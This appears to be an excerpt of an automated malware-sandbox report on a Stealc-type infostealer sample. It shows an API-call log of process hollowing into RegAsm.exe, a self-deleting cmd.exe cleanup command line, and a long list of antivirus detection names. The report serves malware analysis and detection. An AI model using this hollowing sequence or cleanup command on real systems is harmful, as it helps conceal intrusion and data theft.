NtSetContextThread Aug. 24, 2024, 6:59 p.m.	registers.eip: 2005598660 registers.esp: 1703252 registers.edi: 0 registers.eax: 4282160 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000001e4 process_identifier: 2736	1	0
NtResumeThread Aug. 24, 2024, 6:59 p.m.	thread_handle: 0x000001e4 suspend_count: 1 process_identifier: 2736	1	0
CreateProcessInternalW Aug. 24, 2024, 7 p.m.	thread_identifier: 1800 thread_handle: 0x0000031c process_identifier: 1676 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & rd /s /q "C:\ProgramData\BFCGDAAKFHID" & exit filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000314	1	1
NtResumeThread Aug. 24, 2024, 7 p.m.	thread_handle: 0x0000031c suspend_count: 1 process_identifier: 1676	1	0
CreateProcessInternalW Aug. 24, 2024, 6:59 p.m.	thread_identifier: 2900 thread_handle: 0x00000084 process_identifier: 2896 current_directory: filepath: C:\Users\test22CGCAKKKEGC.exe track: 1 command_line: "C:\Users\test22CGCAKKKEGC.exe" filepath_r: C:\Users\test22CGCAKKKEGC.exe stack_pivoted: 0 creation_flags: 525328 (CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
NtResumeThread Aug. 24, 2024, 6:59 p.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2896	1	0
NtResumeThread Aug. 24, 2024, 6:59 p.m.	thread_handle: 0x000000e4 suspend_count: 1 process_identifier: 2896	1	0
NtResumeThread Aug. 24, 2024, 6:59 p.m.	thread_handle: 0x00000158 suspend_count: 1 process_identifier: 2896	1	0
NtResumeThread Aug. 24, 2024, 6:59 p.m.	thread_handle: 0x0000019c suspend_count: 1 process_identifier: 2896	1	0
CreateProcessInternalW Aug. 24, 2024, 6:59 p.m.	thread_identifier: 3000 thread_handle: 0x000001dc process_identifier: 2996 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000001e4	1	1
NtGetContextThread Aug. 24, 2024, 6:59 p.m.	thread_handle: 0x000001dc	1	0
NtAllocateVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 2996 region_size: 323584 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000001e4	1	0
WriteProcessMemory Aug. 24, 2024, 6:59 p.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELÓÈfàlÈÐ@ð@ ¤x HB0¥¬.textXkl `.rdataW(*p@@.dataDî°Z@À.relocHB Dô@B base_address: 0x00400000 process_identifier: 2996 process_handle: 0x000001e4	1	1
WriteProcessMemory Aug. 24, 2024, 6:59 p.m.	buffer: base_address: 0x00401000 process_identifier: 2996 process_handle: 0x000001e4	1	1
WriteProcessMemory Aug. 24, 2024, 6:59 p.m.	buffer: base_address: 0x00438000 process_identifier: 2996 process_handle: 0x000001e4	1	1
WriteProcessMemory Aug. 24, 2024, 6:59 p.m.	buffer: base_address: 0x0043b000 process_identifier: 2996 process_handle: 0x000001e4	1	1
WriteProcessMemory Aug. 24, 2024, 6:59 p.m.	buffer: base_address: 0x0044a000 process_identifier: 2996 process_handle: 0x000001e4	1	1

File has been identified by 52 AntiVirus engines on VirusTotal as malicious (50 out of 52 events)

Bkav	W32.AIDetectMalware.CS
Lionic	Trojan.Win32.Stealer.12!c
Elastic	malicious (high confidence)
Skyhigh	Artemis!Trojan
ALYac	Gen:Variant.Lazy.587642
Cylance	Unsafe
VIPRE	Gen:Variant.Lazy.587642
Sangfor	Infostealer.Msil.Lazy.V40y
K7AntiVirus	Unwanted-Program ( 700000121 )
BitDefender	Gen:Variant.Lazy.587642
K7GW	Unwanted-Program ( 700000121 )
Cybereason	malicious.6ad139
Arcabit	Trojan.Lazy.D8F77A
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of MSIL/GenKryptik_AGen.AUO
APEX	Malicious
McAfee	Artemis!258229D6AD13
Avast	Win32:PWSX-gen [Trj]
Kaspersky	HEUR:Trojan-Spy.MSIL.Stealer.gen
Alibaba	Trojan:MSIL/GenKryptik_AGen.5ce25cf7
MicroWorld-eScan	Gen:Variant.Lazy.587642
Rising	Stealer.Agent!8.C2 (CLOUD)
Emsisoft	Gen:Variant.Lazy.587642 (B)
F-Secure	Trojan.TR/AD.Stealc.fgqfw
McAfeeD	ti!DDB51C81BBEF
FireEye	Generic.mg.258229d6ad139e74
Sophos	Mal/Generic-S
SentinelOne	Static AI - Suspicious PE
Webroot	W32.Trojan.MSIL.Stealer
Google	Detected
Avira	TR/AD.Stealc.fgqfw
MAX	malware (ai score=82)
Antiy-AVL	Trojan[Spy]/MSIL.Stealer
Kingsoft	MSIL.Trojan-Spy.Stealer.gen
Gridinsoft	Spy.Win32.Gen.tr
Microsoft	Trojan:Win32/Sabsik.FL.A!ml
ZoneAlarm	HEUR:Trojan-Spy.MSIL.Stealer.gen
GData	Win32.Trojan.Kryptik.20H8AH
AhnLab-V3	Trojan/Win.Generic.C5661464
BitDefenderTheta	Gen:NN.ZemsilCO.36812.mm2@aWVYl1k
DeepInstinct	MALICIOUS
Malwarebytes	Trojan.Downloader
Ikarus	Win32.Outbreak
Panda	Trj/Chgt.AD
TrendMicro-HouseCall	Trojan.Win32.PRIVATELOADER.YXEHXZ
Tencent	Win32.Trojan.FalseSign.Imnw
huorong	Trojan/MSIL.Agent.li
Fortinet	MSIL/GenKryptik.AUP!tr
AVG	Win32:PWSX-gen [Trj]
Paloalto	generic.ml

66c8f17d5f1ae_selwq.exe#space

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All